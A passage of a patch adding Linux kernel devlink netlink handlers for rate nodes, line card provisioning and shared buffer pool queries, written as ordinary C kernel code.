++				struct nlattr *nla_parent)
++{
++	struct devlink *devlink = devlink_rate->devlink;
++	const char *parent_name = nla_data(nla_parent);
++	const struct devlink_ops *ops = devlink->ops;
++	size_t len = strlen(parent_name);
++	struct devlink_rate *parent;
++	int err = -EOPNOTSUPP;
++
++	parent = devlink_rate->parent;
++	if (parent && len) {
++		NL_SET_ERR_MSG_MOD(info->extack, "Rate object already has parent.");
++		return -EBUSY;
++	} else if (parent && !len) {
++		if (devlink_rate_is_leaf(devlink_rate))
++			err = ops->rate_leaf_parent_set(devlink_rate, NULL,
++							devlink_rate->priv, NULL,
++							info->extack);
++		else if (devlink_rate_is_node(devlink_rate))
++			err = ops->rate_node_parent_set(devlink_rate, NULL,
++							devlink_rate->priv, NULL,
++							info->extack);
++		if (err)
++			return err;
++
++		refcount_dec(&parent->refcnt);
++		devlink_rate->parent = NULL;
++	} else if (!parent && len) {
++		parent = devlink_rate_node_get_by_name(devlink, parent_name);
++		if (IS_ERR(parent))
++			return -ENODEV;
++
++		if (parent == devlink_rate) {
++			NL_SET_ERR_MSG_MOD(info->extack, "Parent to self is not allowed");
++			return -EINVAL;
++		}
++
++		if (devlink_rate_is_node(devlink_rate) &&
++		    devlink_rate_is_parent_node(devlink_rate, parent->parent)) {
++			NL_SET_ERR_MSG_MOD(info->extack, "Node is already a parent of parent node.");
++			return -EEXIST;
++		}
++
++		if (devlink_rate_is_leaf(devlink_rate))
++			err = ops->rate_leaf_parent_set(devlink_rate, parent,
++							devlink_rate->priv, parent->priv,
++							info->extack);
++		else if (devlink_rate_is_node(devlink_rate))
++			err = ops->rate_node_parent_set(devlink_rate, parent,
++							devlink_rate->priv, parent->priv,
++							info->extack);
++		if (err)
++			return err;
++
++		refcount_inc(&parent->refcnt);
++		devlink_rate->parent = parent;
++	}
++
++	return 0;
++}
++
++static int devlink_nl_rate_set(struct devlink_rate *devlink_rate,
++			       const struct devlink_ops *ops,
++			       struct genl_info *info)
++{
++	struct nlattr *nla_parent, **attrs = info->attrs;
++	int err = -EOPNOTSUPP;
++	u64 rate;
++
++	if (attrs[DEVLINK_ATTR_RATE_TX_SHARE]) {
++		rate = nla_get_u64(attrs[DEVLINK_ATTR_RATE_TX_SHARE]);
++		if (devlink_rate_is_leaf(devlink_rate))
++			err = ops->rate_leaf_tx_share_set(devlink_rate, devlink_rate->priv,
++							  rate, info->extack);
++		else if (devlink_rate_is_node(devlink_rate))
++			err = ops->rate_node_tx_share_set(devlink_rate, devlink_rate->priv,
++							  rate, info->extack);
++		if (err)
++			return err;
++		devlink_rate->tx_share = rate;
++	}
++
++	if (attrs[DEVLINK_ATTR_RATE_TX_MAX]) {
++		rate = nla_get_u64(attrs[DEVLINK_ATTR_RATE_TX_MAX]);
++		if (devlink_rate_is_leaf(devlink_rate))
++			err = ops->rate_leaf_tx_max_set(devlink_rate, devlink_rate->priv,
++							rate, info->extack);
++		else if (devlink_rate_is_node(devlink_rate))
++			err = ops->rate_node_tx_max_set(devlink_rate, devlink_rate->priv,
++							rate, info->extack);
++		if (err)
++			return err;
++		devlink_rate->tx_max = rate;
++	}
++
++	nla_parent = attrs[DEVLINK_ATTR_RATE_PARENT_NODE_NAME];
++	if (nla_parent) {
++		err = devlink_nl_rate_parent_node_set(devlink_rate, info,
++						      nla_parent);
++		if (err)
++			return err;
++	}
++
++	return 0;
++}
++
++static bool devlink_rate_set_ops_supported(const struct devlink_ops *ops,
++					   struct genl_info *info,
++					   enum devlink_rate_type type)
++{
++	struct nlattr **attrs = info->attrs;
++
++	if (type == DEVLINK_RATE_TYPE_LEAF) {
++		if (attrs[DEVLINK_ATTR_RATE_TX_SHARE] && !ops->rate_leaf_tx_share_set) {
++			NL_SET_ERR_MSG_MOD(info->extack, "TX share set isn't supported for the leafs");
++			return false;
++		}
++		if (attrs[DEVLINK_ATTR_RATE_TX_MAX] && !ops->rate_leaf_tx_max_set) {
++			NL_SET_ERR_MSG_MOD(info->extack, "TX max set isn't supported for the leafs");
++			return false;
++		}
++		if (attrs[DEVLINK_ATTR_RATE_PARENT_NODE_NAME] &&
++		    !ops->rate_leaf_parent_set) {
++			NL_SET_ERR_MSG_MOD(info->extack, "Parent set isn't supported for the leafs");
++			return false;
++		}
++	} else if (type == DEVLINK_RATE_TYPE_NODE) {
++		if (attrs[DEVLINK_ATTR_RATE_TX_SHARE] && !ops->rate_node_tx_share_set) {
++			NL_SET_ERR_MSG_MOD(info->extack, "TX share set isn't supported for the nodes");
++			return false;
++		}
++		if (attrs[DEVLINK_ATTR_RATE_TX_MAX] && !ops->rate_node_tx_max_set) {
++			NL_SET_ERR_MSG_MOD(info->extack, "TX max set isn't supported for the nodes");
++			return false;
++		}
++		if (attrs[DEVLINK_ATTR_RATE_PARENT_NODE_NAME] &&
++		    !ops->rate_node_parent_set) {
++			NL_SET_ERR_MSG_MOD(info->extack, "Parent set isn't supported for the nodes");
++			return false;
++		}
++	} else {
++		WARN(1, "Unknown type of rate object");
++		return false;
++	}
++
++	return true;
++}
++
++static int devlink_nl_cmd_rate_set_doit(struct sk_buff *skb,
++					struct genl_info *info)
++{
++	struct devlink_rate *devlink_rate = info->user_ptr[1];
++	struct devlink *devlink = devlink_rate->devlink;
++	const struct devlink_ops *ops = devlink->ops;
++	int err;
++
++	if (!ops || !devlink_rate_set_ops_supported(ops, info, devlink_rate->type))
++		return -EOPNOTSUPP;
++
++	err = devlink_nl_rate_set(devlink_rate, ops, info);
++
++	if (!err)
++		devlink_rate_notify(devlink_rate, DEVLINK_CMD_RATE_NEW);
++	return err;
++}
++
++static int devlink_nl_cmd_rate_new_doit(struct sk_buff *skb,
++					struct genl_info *info)
++{
++	struct devlink *devlink = info->user_ptr[0];
++	struct devlink_rate *rate_node;
++	const struct devlink_ops *ops;
++	int err;
++
++	ops = devlink->ops;
++	if (!ops || !ops->rate_node_new || !ops->rate_node_del) {
++		NL_SET_ERR_MSG_MOD(info->extack, "Rate nodes aren't supported");
++		return -EOPNOTSUPP;
++	}
++
++	if (!devlink_rate_set_ops_supported(ops, info, DEVLINK_RATE_TYPE_NODE))
++		return -EOPNOTSUPP;
++
++	rate_node = devlink_rate_node_get_from_attrs(devlink, info->attrs);
++	if (!IS_ERR(rate_node))
++		return -EEXIST;
++	else if (rate_node == ERR_PTR(-EINVAL))
++		return -EINVAL;
++
++	rate_node = kzalloc(sizeof(*rate_node), GFP_KERNEL);
++	if (!rate_node)
++		return -ENOMEM;
++
++	rate_node->devlink = devlink;
++	rate_node->type = DEVLINK_RATE_TYPE_NODE;
++	rate_node->name = nla_strdup(info->attrs[DEVLINK_ATTR_RATE_NODE_NAME], GFP_KERNEL);
++	if (!rate_node->name) {
++		err = -ENOMEM;
++		goto err_strdup;
++	}
++
++	err = ops->rate_node_new(rate_node, &rate_node->priv, info->extack);
++	if (err)
++		goto err_node_new;
++
++	err = devlink_nl_rate_set(rate_node, ops, info);
++	if (err)
++		goto err_rate_set;
++
++	refcount_set(&rate_node->refcnt, 1);
++	list_add(&rate_node->list, &devlink->rate_list);
++	devlink_rate_notify(rate_node, DEVLINK_CMD_RATE_NEW);
++	return 0;
++
++err_rate_set:
++	ops->rate_node_del(rate_node, rate_node->priv, info->extack);
++err_node_new:
++	kfree(rate_node->name);
++err_strdup:
++	kfree(rate_node);
++	return err;
++}
++
++static int devlink_nl_cmd_rate_del_doit(struct sk_buff *skb,
++					struct genl_info *info)
++{
++	struct devlink_rate *rate_node = info->user_ptr[1];
++	struct devlink *devlink = rate_node->devlink;
++	const struct devlink_ops *ops = devlink->ops;
++	int err;
++
++	if (refcount_read(&rate_node->refcnt) > 1) {
++		NL_SET_ERR_MSG_MOD(info->extack, "Node has children. Cannot delete node.");
++		return -EBUSY;
++	}
++
++	devlink_rate_notify(rate_node, DEVLINK_CMD_RATE_DEL);
++	err = ops->rate_node_del(rate_node, rate_node->priv, info->extack);
++	if (rate_node->parent)
++		refcount_dec(&rate_node->parent->refcnt);
++	list_del(&rate_node->list);
++	kfree(rate_node->name);
++	kfree(rate_node);
++	return err;
++}
++
++struct devlink_linecard_type {
++	const char *type;
++	const void *priv;
++};
++
++static int devlink_nl_linecard_fill(struct sk_buff *msg,
++				    struct devlink *devlink,
++				    struct devlink_linecard *linecard,
++				    enum devlink_command cmd, u32 portid,
++				    u32 seq, int flags,
++				    struct netlink_ext_ack *extack)
++{
++	struct devlink_linecard_type *linecard_type;
++	struct nlattr *attr;
++	void *hdr;
++	int i;
++
++	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
++	if (!hdr)
++		return -EMSGSIZE;
++
++	if (devlink_nl_put_handle(msg, devlink))
++		goto nla_put_failure;
++	if (nla_put_u32(msg, DEVLINK_ATTR_LINECARD_INDEX, linecard->index))
++		goto nla_put_failure;
++	if (nla_put_u8(msg, DEVLINK_ATTR_LINECARD_STATE, linecard->state))
++		goto nla_put_failure;
++	if (linecard->type &&
++	    nla_put_string(msg, DEVLINK_ATTR_LINECARD_TYPE, linecard->type))
++		goto nla_put_failure;
++
++	if (linecard->types_count) {
++		attr = nla_nest_start(msg,
++				      DEVLINK_ATTR_LINECARD_SUPPORTED_TYPES);
++		if (!attr)
++			goto nla_put_failure;
++		for (i = 0; i < linecard->types_count; i++) {
++			linecard_type = &linecard->types[i];
++			if (nla_put_string(msg, DEVLINK_ATTR_LINECARD_TYPE,
++					   linecard_type->type)) {
++				nla_nest_cancel(msg, attr);
++				goto nla_put_failure;
++			}
++		}
++		nla_nest_end(msg, attr);
++	}
++
++	if (linecard->nested_devlink &&
++	    devlink_nl_put_nested_handle(msg, linecard->nested_devlink))
++		goto nla_put_failure;
++
++	genlmsg_end(msg, hdr);
++	return 0;
++
++nla_put_failure:
++	genlmsg_cancel(msg, hdr);
++	return -EMSGSIZE;
++}
++
++static void devlink_linecard_notify(struct devlink_linecard *linecard,
++				    enum devlink_command cmd)
++{
++	struct devlink *devlink = linecard->devlink;
++	struct sk_buff *msg;
++	int err;
++
++	WARN_ON(cmd != DEVLINK_CMD_LINECARD_NEW &&
++		cmd != DEVLINK_CMD_LINECARD_DEL);
++
++	if (!xa_get_mark(&devlinks, devlink->index, DEVLINK_REGISTERED))
++		return;
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg)
++		return;
++
++	err = devlink_nl_linecard_fill(msg, devlink, linecard, cmd, 0, 0, 0,
++				       NULL);
++	if (err) {
++		nlmsg_free(msg);
++		return;
++	}
++
++	genlmsg_multicast_netns(&devlink_nl_family, devlink_net(devlink),
++				msg, 0, DEVLINK_MCGRP_CONFIG, GFP_KERNEL);
++}
++
++static int devlink_nl_cmd_linecard_get_doit(struct sk_buff *skb,
++					    struct genl_info *info)
++{
++	struct devlink_linecard *linecard = info->user_ptr[1];
++	struct devlink *devlink = linecard->devlink;
++	struct sk_buff *msg;
++	int err;
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg)
++		return -ENOMEM;
++
++	mutex_lock(&linecard->state_lock);
++	err = devlink_nl_linecard_fill(msg, devlink, linecard,
++				       DEVLINK_CMD_LINECARD_NEW,
++				       info->snd_portid, info->snd_seq, 0,
++				       info->extack);
++	mutex_unlock(&linecard->state_lock);
++	if (err) {
++		nlmsg_free(msg);
++		return err;
++	}
++
++	return genlmsg_reply(msg, info);
++}
++
++static int devlink_nl_cmd_linecard_get_dumpit(struct sk_buff *msg,
++					      struct netlink_callback *cb)
++{
++	struct devlink_linecard *linecard;
++	struct devlink *devlink;
++	int start = cb->args[0];
++	unsigned long index;
++	int idx = 0;
++	int err;
++
++	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
++		mutex_lock(&devlink->linecards_lock);
++		list_for_each_entry(linecard, &devlink->linecard_list, list) {
++			if (idx < start) {
++				idx++;
++				continue;
++			}
++			mutex_lock(&linecard->state_lock);
++			err = devlink_nl_linecard_fill(msg, devlink, linecard,
++						       DEVLINK_CMD_LINECARD_NEW,
++						       NETLINK_CB(cb->skb).portid,
++						       cb->nlh->nlmsg_seq,
++						       NLM_F_MULTI,
++						       cb->extack);
++			mutex_unlock(&linecard->state_lock);
++			if (err) {
++				mutex_unlock(&devlink->linecards_lock);
++				devlink_put(devlink);
++				goto out;
++			}
++			idx++;
++		}
++		mutex_unlock(&devlink->linecards_lock);
++		devlink_put(devlink);
++	}
++out:
++	cb->args[0] = idx;
++	return msg->len;
++}
++
++static struct devlink_linecard_type *
++devlink_linecard_type_lookup(struct devlink_linecard *linecard,
++			     const char *type)
++{
++	struct devlink_linecard_type *linecard_type;
++	int i;
++
++	for (i = 0; i < linecard->types_count; i++) {
++		linecard_type = &linecard->types[i];
++		if (!strcmp(type, linecard_type->type))
++			return linecard_type;
++	}
++	return NULL;
++}
++
++static int devlink_linecard_type_set(struct devlink_linecard *linecard,
++				     const char *type,
++				     struct netlink_ext_ack *extack)
++{
++	const struct devlink_linecard_ops *ops = linecard->ops;
++	struct devlink_linecard_type *linecard_type;
++	int err;
++
++	mutex_lock(&linecard->state_lock);
++	if (linecard->state == DEVLINK_LINECARD_STATE_PROVISIONING) {
++		NL_SET_ERR_MSG_MOD(extack, "Line card is currently being provisioned");
++		err = -EBUSY;
++		goto out;
++	}
++	if (linecard->state == DEVLINK_LINECARD_STATE_UNPROVISIONING) {
++		NL_SET_ERR_MSG_MOD(extack, "Line card is currently being unprovisioned");
++		err = -EBUSY;
++		goto out;
++	}
++
++	linecard_type = devlink_linecard_type_lookup(linecard, type);
++	if (!linecard_type) {
++		NL_SET_ERR_MSG_MOD(extack, "Unsupported line card type provided");
++		err = -EINVAL;
++		goto out;
++	}
++
++	if (linecard->state != DEVLINK_LINECARD_STATE_UNPROVISIONED &&
++	    linecard->state != DEVLINK_LINECARD_STATE_PROVISIONING_FAILED) {
++		NL_SET_ERR_MSG_MOD(extack, "Line card already provisioned");
++		err = -EBUSY;
++		/* Check if the line card is provisioned in the same
++		 * way the user asks. In case it is, make the operation
++		 * to return success.
++		 */
++		if (ops->same_provision &&
++		    ops->same_provision(linecard, linecard->priv,
++					linecard_type->type,
++					linecard_type->priv))
++			err = 0;
++		goto out;
++	}
++
++	linecard->state = DEVLINK_LINECARD_STATE_PROVISIONING;
++	linecard->type = linecard_type->type;
++	devlink_linecard_notify(linecard, DEVLINK_CMD_LINECARD_NEW);
++	mutex_unlock(&linecard->state_lock);
++	err = ops->provision(linecard, linecard->priv, linecard_type->type,
++			     linecard_type->priv, extack);
++	if (err) {
++		/* Provisioning failed. Assume the linecard is unprovisioned
++		 * for future operations.
++		 */
++		mutex_lock(&linecard->state_lock);
++		linecard->state = DEVLINK_LINECARD_STATE_UNPROVISIONED;
++		linecard->type = NULL;
++		devlink_linecard_notify(linecard, DEVLINK_CMD_LINECARD_NEW);
++		mutex_unlock(&linecard->state_lock);
++	}
++	return err;
++
++out:
++	mutex_unlock(&linecard->state_lock);
++	return err;
++}
++
++static int devlink_linecard_type_unset(struct devlink_linecard *linecard,
++				       struct netlink_ext_ack *extack)
++{
++	int err;
++
++	mutex_lock(&linecard->state_lock);
++	if (linecard->state == DEVLINK_LINECARD_STATE_PROVISIONING) {
++		NL_SET_ERR_MSG_MOD(extack, "Line card is currently being provisioned");
++		err = -EBUSY;
++		goto out;
++	}
++	if (linecard->state == DEVLINK_LINECARD_STATE_UNPROVISIONING) {
++		NL_SET_ERR_MSG_MOD(extack, "Line card is currently being unprovisioned");
++		err = -EBUSY;
++		goto out;
++	}
++	if (linecard->state == DEVLINK_LINECARD_STATE_PROVISIONING_FAILED) {
++		linecard->state = DEVLINK_LINECARD_STATE_UNPROVISIONED;
++		linecard->type = NULL;
++		devlink_linecard_notify(linecard, DEVLINK_CMD_LINECARD_NEW);
++		err = 0;
++		goto out;
++	}
++
++	if (linecard->state == DEVLINK_LINECARD_STATE_UNPROVISIONED) {
++		NL_SET_ERR_MSG_MOD(extack, "Line card is not provisioned");
++		err = 0;
++		goto out;
++	}
++	linecard->state = DEVLINK_LINECARD_STATE_UNPROVISIONING;
++	devlink_linecard_notify(linecard, DEVLINK_CMD_LINECARD_NEW);
++	mutex_unlock(&linecard->state_lock);
++	err = linecard->ops->unprovision(linecard, linecard->priv,
++					 extack);
++	if (err) {
++		/* Unprovisioning failed. Assume the linecard is unprovisioned
++		 * for future operations.
++		 */
++		mutex_lock(&linecard->state_lock);
++		linecard->state = DEVLINK_LINECARD_STATE_UNPROVISIONED;
++		linecard->type = NULL;
++		devlink_linecard_notify(linecard, DEVLINK_CMD_LINECARD_NEW);
++		mutex_unlock(&linecard->state_lock);
++	}
++	return err;
++
++out:
++	mutex_unlock(&linecard->state_lock);
++	return err;
++}
++
++static int devlink_nl_cmd_linecard_set_doit(struct sk_buff *skb,
++					    struct genl_info *info)
++{
++	struct devlink_linecard *linecard = info->user_ptr[1];
++	struct netlink_ext_ack *extack = info->extack;
++	int err;
++
++	if (info->attrs[DEVLINK_ATTR_LINECARD_TYPE]) {
++		const char *type;
++
++		type = nla_data(info->attrs[DEVLINK_ATTR_LINECARD_TYPE]);
++		if (strcmp(type, "")) {
++			err = devlink_linecard_type_set(linecard, type, extack);
++			if (err)
++				return err;
++		} else {
++			err = devlink_linecard_type_unset(linecard, extack);
++			if (err)
++				return err;
++		}
++	}
++
++	return 0;
++}
++
++static int devlink_nl_sb_fill(struct sk_buff *msg, struct devlink *devlink,
++			      struct devlink_sb *devlink_sb,
++			      enum devlink_command cmd, u32 portid,
++			      u32 seq, int flags)
++{
++	void *hdr;
++
++	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
++	if (!hdr)
++		return -EMSGSIZE;
++
++	if (devlink_nl_put_handle(msg, devlink))
++		goto nla_put_failure;
++	if (nla_put_u32(msg, DEVLINK_ATTR_SB_INDEX, devlink_sb->index))
++		goto nla_put_failure;
++	if (nla_put_u32(msg, DEVLINK_ATTR_SB_SIZE, devlink_sb->size))
++		goto nla_put_failure;
++	if (nla_put_u16(msg, DEVLINK_ATTR_SB_INGRESS_POOL_COUNT,
++			devlink_sb->ingress_pools_count))
++		goto nla_put_failure;
++	if (nla_put_u16(msg, DEVLINK_ATTR_SB_EGRESS_POOL_COUNT,
++			devlink_sb->egress_pools_count))
++		goto nla_put_failure;
++	if (nla_put_u16(msg, DEVLINK_ATTR_SB_INGRESS_TC_COUNT,
++			devlink_sb->ingress_tc_count))
++		goto nla_put_failure;
++	if (nla_put_u16(msg, DEVLINK_ATTR_SB_EGRESS_TC_COUNT,
++			devlink_sb->egress_tc_count))
++		goto nla_put_failure;
++
++	genlmsg_end(msg, hdr);
++	return 0;
++
++nla_put_failure:
++	genlmsg_cancel(msg, hdr);
++	return -EMSGSIZE;
++}
++
++static int devlink_nl_cmd_sb_get_doit(struct sk_buff *skb,
++				      struct genl_info *info)
++{
++	struct devlink *devlink = info->user_ptr[0];
++	struct devlink_sb *devlink_sb;
++	struct sk_buff *msg;
++	int err;
++
++	devlink_sb = devlink_sb_get_from_info(devlink, info);
++	if (IS_ERR(devlink_sb))
++		return PTR_ERR(devlink_sb);
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg)
++		return -ENOMEM;
++
++	err = devlink_nl_sb_fill(msg, devlink, devlink_sb,
++				 DEVLINK_CMD_SB_NEW,
++				 info->snd_portid, info->snd_seq, 0);
++	if (err) {
++		nlmsg_free(msg);
++		return err;
++	}
++
++	return genlmsg_reply(msg, info);
++}
++
++static int devlink_nl_cmd_sb_get_dumpit(struct sk_buff *msg,
++					struct netlink_callback *cb)
++{
++	struct devlink *devlink;
++	struct devlink_sb *devlink_sb;
++	int start = cb->args[0];
++	unsigned long index;
++	int idx = 0;
++	int err;
++
++	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
++		devl_lock(devlink);
++		list_for_each_entry(devlink_sb, &devlink->sb_list, list) {
++			if (idx < start) {
++				idx++;
++				continue;
++			}
++			err = devlink_nl_sb_fill(msg, devlink, devlink_sb,
++						 DEVLINK_CMD_SB_NEW,
++						 NETLINK_CB(cb->skb).portid,
++						 cb->nlh->nlmsg_seq,
++						 NLM_F_MULTI);
++			if (err) {
++				devl_unlock(devlink);
++				devlink_put(devlink);
++				goto out;
++			}
++			idx++;
++		}
++		devl_unlock(devlink);
++		devlink_put(devlink);
++	}
++out:
++	cb->args[0] = idx;
++	return msg->len;
++}
++
++static int devlink_nl_sb_pool_fill(struct sk_buff *msg, struct devlink *devlink,
++				   struct devlink_sb *devlink_sb,
++				   u16 pool_index, enum devlink_command cmd,
++				   u32 portid, u32 seq, int flags)
++{
++	struct devlink_sb_pool_info pool_info;
++	void *hdr;
++	int err;
++
++	err = devlink->ops->sb_pool_get(devlink, devlink_sb->index,
++					pool_index, &pool_info);
++	if (err)
++		return err;
++
++	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
++	if (!hdr)
++		return -EMSGSIZE;
++
++	if (devlink_nl_put_handle(msg, devlink))
++		goto nla_put_failure;
++	if (nla_put_u32(msg, DEVLINK_ATTR_SB_INDEX, devlink_sb->index))
++		goto nla_put_failure;
++	if (nla_put_u16(msg, DEVLINK_ATTR_SB_POOL_INDEX, pool_index))
++		goto nla_put_failure;
++	if (nla_put_u8(msg, DEVLINK_ATTR_SB_POOL_TYPE, pool_info.pool_type))
++		goto nla_put_failure;
++	if (nla_put_u32(msg, DEVLINK_ATTR_SB_POOL_SIZE, pool_info.size))
++		goto nla_put_failure;
++	if (nla_put_u8(msg, DEVLINK_ATTR_SB_POOL_THRESHOLD_TYPE,
++		       pool_info.threshold_type))
++		goto nla_put_failure;
++	if (nla_put_u32(msg, DEVLINK_ATTR_SB_POOL_CELL_SIZE,
++			pool_info.cell_size))
++		goto nla_put_failure;
++
++	genlmsg_end(msg, hdr);
++	return 0;
++
++nla_put_failure:
++	genlmsg_cancel(msg, hdr);
++	return -EMSGSIZE;
++}
++
++static int devlink_nl_cmd_sb_pool_get_doit(struct sk_buff *skb,
++					   struct genl_info *info)
++{
++	struct devlink *devlink = info->user_ptr[0];
++	struct devlink_sb *devlink_sb;
++	struct sk_buff *msg;
++	u16 pool_index;
++	int err;
++
++	devlink_sb = devlink_sb_get_from_info(devlink, info);
++	if (IS_ERR(devlink_sb))
++		return PTR_ERR(devlink_sb);
++
++	err = devlink_sb_pool_index_get_from_info(devlink_sb, info,
++						  &pool_index);
++	if (err)
++		return err;
++
++	if (!devlink->ops->sb_pool_get)
++		return -EOPNOTSUPP;
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg)
++		return -ENOMEM;
++
++	err = devlink_nl_sb_pool_fill(msg, devlink, devlink_sb, pool_index,
++				      DEVLINK_CMD_SB_POOL_NEW,
++				      info->snd_portid, info->snd_seq, 0);
++	if (err) {
++		nlmsg_free(msg);
++		return err;
++	}
++
++	return genlmsg_reply(msg, info);
++}
++
++static int __sb_pool_get_dumpit(struct sk_buff *msg, int start, int *p_idx,
++				struct devlink *devlink,
++				struct devlink_sb *devlink_sb,
++				u32 portid, u32 seq)
++{
++	u16 pool_count = devlink_sb_pool_count(devlink_sb);
++	u16 pool_index;
++	int err;
++
++	for (pool_index = 0; pool_index < pool_count; pool_index++) {
++		if (*p_idx < start) {
++			(*p_idx)++;
++			continue;
++		}
++		err = devlink_nl_sb_pool_fill(msg, devlink,
++					      devlink_sb,
++					      pool_index,
++					      DEVLINK_CMD_SB_POOL_NEW,
++					      portid, seq, NLM_F_MULTI);
++		if (err)
++			return err;
++		(*p_idx)++;
++	}
++	return 0;
++}
++
++static int devlink_nl_cmd_sb_pool_get_dumpit(struct sk_buff *msg,
++					     struct netlink_callback *cb)
++{
++	struct devlink *devlink;
++	struct devlink_sb *devlink_sb;
++	int start = cb->args[0];
++	unsigned long index;
++	int idx = 0;
++	int err = 0;
++
++	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
++		if (!devlink->ops->sb_pool_get)
++			goto retry;
++
++		devl_lock(devlink);
++		list_for_each_entry(devlink_sb, &devlink->sb_list, list) {
++			err = __sb_pool_get_dumpit(msg, start, &idx, devlink,
++						   devlink_sb,
++						   NETLINK_CB(cb->skb).portid,
++						   cb->nlh->nlmsg_seq);
++			if (err == -EOPNOTSUPP) {
++				err = 0;
++			} else if (err) {
++				devl_unlock(devlink);
++				devlink_put(devlink);
++				goto out;
++			}
++		}
++		devl_unlock(devlink);
++retry:
++		devlink_put(devlink);
++	}
++out:
++	if (err != -EMSGSIZE)
++		return err;
++
++	cb->args[0] = idx;
++	return msg->len;
++}
++
++static int devlink_sb_pool_set(struct devlink *devlink, unsigned int sb_index,
++			       u16 pool_index, u32 size,
++			       enum devlink_sb_threshold_type threshold_type,
++			       struct netlink_ext_ack *extack)
++
++{
++	const struct devlink_ops *ops = devlink->ops;
++
++	if (ops->sb_pool_set)
++		return ops->sb_pool_set(devlink, sb_index, pool_index,
++					size, threshold_type, extack);
++	return -EOPNOTSUPP;
++}
++
++static int devlink_nl_cmd_sb_pool_set_doit(struct sk_buff *skb,
++					   struct genl_info *info)
++{
++	struct devlink *devlink = info->user_ptr[0];
++	enum devlink_sb_threshold_type threshold_type;
++	struct devlink_sb *devlink_sb;
++	u16 pool_index;
++	u32 size;
++	int err;
++
++	devlink_sb = devlink_sb_get_from_info(devlink, info);
++	if (IS_ERR(devlink_sb))
++		return PTR_ERR(devlink_sb);
++
++	err = devlink_sb_pool_index_get_from_info(devlink_sb, info,
++						  &pool_index);
++	if (err)
++		return err;
++
++	err = devlink_sb_th_type_get_from_info(info, &threshold_type);
++	if (err)
++		return err;
++
++	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_SB_POOL_SIZE))
++		return -EINVAL;
++
++	size = nla_get_u32(info->attrs[DEVLINK_ATTR_SB_POOL_SIZE]);
++	return devlink_sb_pool_set(devlink, devlink_sb->index,
++				   pool_index, size, threshold_type,
++				   info->extack);
++}
++
++static int devlink_nl_sb_port_pool_fill(struct sk_buff *msg,
++					struct devlink *devlink,
++					struct devlink_port *devlink_port,
++					struct devlink_sb *devlink_sb,
++					u16 pool_index,
++					enum devlink_command cmd,
++					u32 portid, u32 seq, int flags)
++{
++	const struct devlink_ops *ops = devlink->ops;
++	u32 threshold;
++	void *hdr;
++	int err;
++
++	err = ops->sb_port_pool_get(devlink_port, devlink_sb->index,
++				    pool_index, &threshold);
++	if (err)
++		return err;
++
++	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
++	if (!hdr)
++		return -EMSGSIZE;
++
++	if (devlink_nl_put_handle(msg, devlink))
++		goto nla_put_failure;
++	if (nla_put_u32(msg, DEVLINK_ATTR_PORT_INDEX, devlink_port->index))
++		goto nla_put_failure;
++	if (nla_put_u32(msg, DEVLINK_ATTR_SB_INDEX, devlink_sb->index))
++		goto nla_put_failure;
++	if (nla_put_u16(msg, DEVLINK_ATTR_SB_POOL_INDEX, pool_index))
++		goto nla_put_failure;
++	if (nla_put_u32(msg, DEVLINK_ATTR_SB_THRESHOLD, threshold))
++		goto nla_put_failure;
++
++	if (ops->sb_occ_port_pool_get) {
++		u32 cur;
++		u32 max;
++
++		err = ops->sb_occ_port_pool_get(devlink_port, devlink_sb->index,
++						pool_index, &cur, &max);
++		if (err && err != -EOPNOTSUPP)
++			goto sb_occ_get_failure;
++		if (!err) {
++			if (nla_put_u32(msg, DEVLINK_ATTR_SB_OCC_CUR, cur))
++				goto nla_put_failure;
++			if (nla_put_u32(msg, DEVLINK_ATTR_SB_OCC_MAX, max))
++				goto nla_put_failure;
++		}
++	}
++
++	genlmsg_end(msg, hdr);
++	return 0;
++
++nla_put_failure:
++	err = -EMSGSIZE;
++sb_occ_get_failure:
++	genlmsg_cancel(msg, hdr);
++	return err;
++}
++
++static int devlink_nl_cmd_sb_port_pool_get_doit(struct sk_buff *skb,
++						struct genl_info *info)
++{
++	struct devlink_port *devlink_port = info->user_ptr[1];
++	struct devlink *devlink = devlink_port->devlink;
++	struct devlink_sb *devlink_sb;
++	struct sk_buff *msg;
++	u16 pool_index;
++	int err;
++
++	devlink_sb = devlink_sb_get_from_info(devlink, info);
++	if (IS_ERR(devlink_sb))
++		return PTR_ERR(devlink_sb);
++
++	err = devlink_sb_pool_index_get_from_info(devlink_sb, info,
++						  &pool_index);
++	if (err)
++		return err;
++
++	if (!devlink->ops->sb_port_pool_get)
++		return -EOPNOTSUPP;
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg)
++		return -ENOMEM;
++
++	err = devlink_nl_sb_port_pool_fill(msg, devlink, devlink_port,
++					   devlink_sb, pool_index,
++					   DEVLINK_CMD_SB_PORT_POOL_NEW,
++					   info->snd_portid, info->snd_seq, 0);
++	if (err) {
++		nlmsg_free(msg);
++		return err;
++	}
++
++	return genlmsg_reply(msg, info);
++}
++
++static int __sb_port_pool_get_dumpit(struct sk_buff *msg, int start, int *p_idx,
++				     struct devlink *devlink,
++				     struct devlink_sb *devlink_sb,
++				     u32 portid, u32 seq)
++{
++	struct devlink_port *devlink_port;
++	u16 pool_count = devlink_sb_pool_count(devlink_sb);
++	u16 pool_index;
++	int err;
++
++	list_for_each_entry(devlink_port, &devlink->port_list, list) {
++		for (pool_index = 0; pool_index < pool_count; pool_index++) {
++			if (*p_idx < start) {
++				(*p_idx)++;
++				continue;
++			}
++			err = devlink_nl_sb_port_pool_fill(msg, devlink,
++							   devlink_port,
++							   devlink_sb,
++							   pool_index,
++							   DEVLINK_CMD_SB_PORT_POOL_NEW,
++							   portid, seq,
++							   NLM_F_MULTI);
++			if (err)
++				return err;
++			(*p_idx)++;
